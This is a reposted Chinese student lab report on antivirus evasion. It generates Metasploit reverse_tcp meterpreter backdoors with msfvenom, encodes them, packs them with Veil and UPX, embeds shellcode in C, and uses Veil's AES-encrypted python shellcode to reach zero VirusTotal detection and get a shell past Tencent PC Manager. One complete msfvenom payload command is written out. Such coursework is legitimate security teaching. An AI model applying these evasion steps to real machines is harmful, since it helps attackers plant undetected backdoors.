热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

20192219任雨田免杀原理与实践实验报告

免杀原理与实践实践内容一、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件首先先对实验二中生成的后门程序进行检测(检测平台:https:www.virustot

免杀原理与实践

实践内容


一、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

首先先对实验二中生成的后门程序进行检测(检测平台:https://www.virustotal.com/),结果如下:

然后再用msf编码一次(msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -b ‘\x00’ LHOST=192.168.80.129 LPORT=2219 -f exe > 2219met-encoded.exe),对编码一次后的程序重新检测,如图检测率只下降了一点点。

这时再通过编码多次的手段来达到降低检测率,在之前的命令中添加"-i -次数",这里我选择编码了10次,再次检测,结果检测率反而升高了。

于是换一种文件格式再来,采用php文件,检测率明显降低

再试一试jar文件,检测率也相比通过编码的方式降低了不少


二、veil,加壳工具

首先安装veil

安装好后,修改setup.sh中的第260行



然后再输入“veil”等待安装

安装中一路next





安装完成后会提示一个错误

执行以下命令就可以成功启动了



现在开始使用veil生成







生成的文件在Executable written to后的路径中,对其进行检测,检测率有50%左右



然后对其加壳后再检测,没想的检测率居然比不加壳还高。。说明没起到太大的作用






三、使用C + shellcode编程

首先使用msfvenom得到shellcode

将得到的shellcode写入c文件中



然后对其编译为可执行文件

进行检测,检测率下降了一些


四、通过组合应用各种技术实现恶意代码免杀

这里使用python+aes_encrypt的方式:

在veil/evasion中选择使用python/shellcode_inject/aes_encrypt.py,输入generate并选择第二项,然后只需要设置IP地址和端口,生成成功后对其进行检测,检测率为0!


五、用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

用Windows主机做测试,前面生成的后门程序中除了jar、veil.exe、veil_upx.exe、veil.py这些文件以外都被杀软识别查杀了,这里使用的杀软为腾讯电脑管家,于是我们可以用veil_upx.exe来进行回连获取shell。下图为我放进信任区的后门程序,即被腾讯电脑管家识别出的。



我们回到kali中打开msf控制台

配置相关参数

配置完后输入exploit,等待目标执行后门程序,此时再在Windows中执行veil_upx.exe,成功回连,获取到Windows的shell——执行了dir命令


基础问题回答

-杀软是如何检测出恶意代码的?

一般通过这三种方式:基于特征码的检测;启发式恶意软件检测;基于行为的恶意软件检测。

-免杀是做什么?

给木马或病毒程序增加伪装使杀毒软件对其不能做出识别或查杀

-免杀的基本方法有哪些?

改变特征码——加壳、采取编码方式、用不同语言重写再编译;改变行为——使用不同的通讯连接技术、基于内存操作而不是系统;非常规方法——诱导目标关闭AV软件、利用有漏洞的应用。

-开启杀软能绝对防止电脑中恶意代码吗?

显而易见是不能绝对防止的,有很多攻击方式,在杀毒软件暂时落后于攻击技术时,就漏洞百出了,比如可以通过系统自带的漏洞进行攻击,例如利用0day漏洞进行恶意代码攻击杀毒软件基本无法防御。


实践总结与体会

通过这次实践我学到了对恶意程序的免杀的基本内容和原理,也让我了解这些恶意程序以什么样的方式绕过了杀毒软件从而攻击进了我们的电脑中,并且让我对伪装后门程序的整个过程有了一个深刻的认识,同时进一步提高了我的安全意识,我也更加意识到我们在日常生活中使用电子设备时如果不注意信息和网络领域中的安全,也会给我们带来非常大的危害。在这次实验中,我初步学会了veil软件的使用以及更加掌握对MSF软件的使用,一部分通过这些软件生成出的后门程序成功绕过了对我电脑进行实时保护腾讯电脑管家,也提醒我是时候对其进行更新或者换一个杀毒软件了,总的来说,上次实验和这次实验使我对后门这类病毒程序的运作原理及过程的学习收获很大。


原文链接:https://www.cnblogs.com/rryt/p/16071989.html



推荐阅读
  • C++ 开发实战:实用技巧与经验分享
    C++ 开发实战:实用技巧与经验分享 ... [详细]
  • 为了确保iOS应用能够安全地访问网站数据,本文介绍了如何在Nginx服务器上轻松配置CertBot以实现SSL证书的自动化管理。通过这一过程,可以确保应用始终使用HTTPS协议,从而提升数据传输的安全性和可靠性。文章详细阐述了配置步骤和常见问题的解决方法,帮助读者快速上手并成功部署SSL证书。 ... [详细]
  • Presto:高效即席查询引擎的深度解析与应用
    本文深入解析了Presto这一高效的即席查询引擎,详细探讨了其架构设计及其优缺点。Presto通过内存到内存的数据处理方式,显著提升了查询性能,相比传统的MapReduce查询,不仅减少了数据传输的延迟,还提高了查询的准确性和效率。然而,Presto在大规模数据处理和容错机制方面仍存在一定的局限性。本文还介绍了Presto在实际应用中的多种场景,展示了其在大数据分析领域的强大潜力。 ... [详细]
  • python模块之正则
    re模块可以读懂你写的正则表达式根据你写的表达式去执行任务用re去操作正则正则表达式使用一些规则来检测一些字符串是否符合个人要求,从一段字符串中找到符合要求的内容。在 ... [详细]
  • 深入解析Django CBV模型的源码运行机制
    本文详细探讨了Django CBV(Class-Based Views)模型的源码运行流程,通过具体的示例代码和详细的解释,帮助读者更好地理解和应用这一强大的功能。 ... [详细]
  • C#实现文件的压缩与解压
    2019独角兽企业重金招聘Python工程师标准一、准备工作1、下载ICSharpCode.SharpZipLib.dll文件2、项目中引用这个dll二、文件压缩与解压共用类 ... [详细]
  • Spring Data JdbcTemplate 入门指南
    本文将介绍如何使用 Spring JdbcTemplate 进行数据库操作,包括查询和插入数据。我们将通过一个学生表的示例来演示具体步骤。 ... [详细]
  • 我有一个从C项目编译的.o文件,该文件引用了名为init_static_pool ... [详细]
  • 在 Mac 上配置 NDK
    本文详细介绍了如何在 Mac 上配置 Android NDK,包括设置环境变量和解决常见问题的方法。 ... [详细]
  • HTTP(HyperTextTransferProtocol)是超文本传输协议的缩写,它用于传送www方式的数据。HTTP协议采用了请求响应模型。客服端向服务器发送一 ... [详细]
  • 本文详细介绍了 HTML 中 a 标签的 href 属性的多种用法,包括实现超链接、锚点以及调用 JavaScript 方法。通过具体的示例和解释,帮助开发者更好地理解和应用这些技术。 ... [详细]
  • 如何高效查看Java API和源码
    在Java学习过程中,查看API文档和源码是提高编程能力的重要手段。本文将详细介绍如何使用各种工具和方法高效地查看Java API和源码。 ... [详细]
  • 为什么多数程序员难以成为架构师?
    探讨80%的程序员为何难以晋升为架构师,涉及技术深度、经验积累和综合能力等方面。本文将详细解析Tomcat的配置和服务组件,帮助读者理解其内部机制。 ... [详细]
  • DVWA学习笔记系列:深入理解CSRF攻击机制
    DVWA学习笔记系列:深入理解CSRF攻击机制 ... [详细]
  • 本文深入探讨了如何利用Maven高效管理项目中的外部依赖库。通过介绍Maven的官方依赖搜索地址(),详细讲解了依赖库的添加、版本管理和冲突解决等关键操作。此外,还提供了实用的配置示例和最佳实践,帮助开发者优化项目构建流程,提高开发效率。 ... [详细]
author-avatar
妞妞盼寒假_197
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有